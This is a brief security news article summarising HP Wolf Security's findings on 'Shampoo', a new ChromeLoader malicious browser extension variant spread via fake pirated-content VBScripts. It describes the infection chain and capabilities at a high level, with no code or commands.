A new campaign distributing a new version of the ChromeLoader malicious extension has been underway since March 2023, discovered researchers. The variant called Shampoo targets visitors via warez and pirated movie sites. While the older versions of ChromeLoader have a complex infection chain that involves malicious ISO files, the latest version involves the use of malicious VBScript files.
Infection chain
According to HP Wolf Security, the Shampoo ChromeLoader extension is distributed as malicious VBScripts masquerading as free movies, video games, or content hosted on illegal websites.
- These scripts run a PowerShell script that triggers the infection chain and makes the infection persistent.
- Once Shampoo is attached to a Chrome session, it starts sending sensitive information back to a C2 server controlled by the threat actors.
Capabilities of Shampoo ChromeLoader extension
The new version of the ChromeLoader extension includes many anti-debugging and anti-analysis techniques to make detection challenging.
- It is, furthermore, capable of disabling search suggestions in the address bar and redirecting Google, Yahoo, and Bing searchers to the C2 server.
- Shampoo prevents victims from accessing chrome://extensions by redirecting them to chrome://settings.
A glance at the ChromeLoader extension
The ChromeLoader malicious extension was first spotted in early 2022 and since then, it has been part of multiple campaigns.
- In November 2022, the malware was observed focusing on click fraud that forced users to visit unwanted sites to generate revenue from pay-per-click online advertising.
- In September 2022, ChromeLoader was used globally to steal sensitive data and deploy decompression bombs to crash systems.
End note
Researchers claim that there are some minor differences between Shampoo and the earlier version of ChromeLoader. However, to better understand the infection process and attack chain, organizations must refer to the IOCs associated with the malware.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/4b88_shutterstock_361732685.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/482d_shutterstock_789423511.jpg)
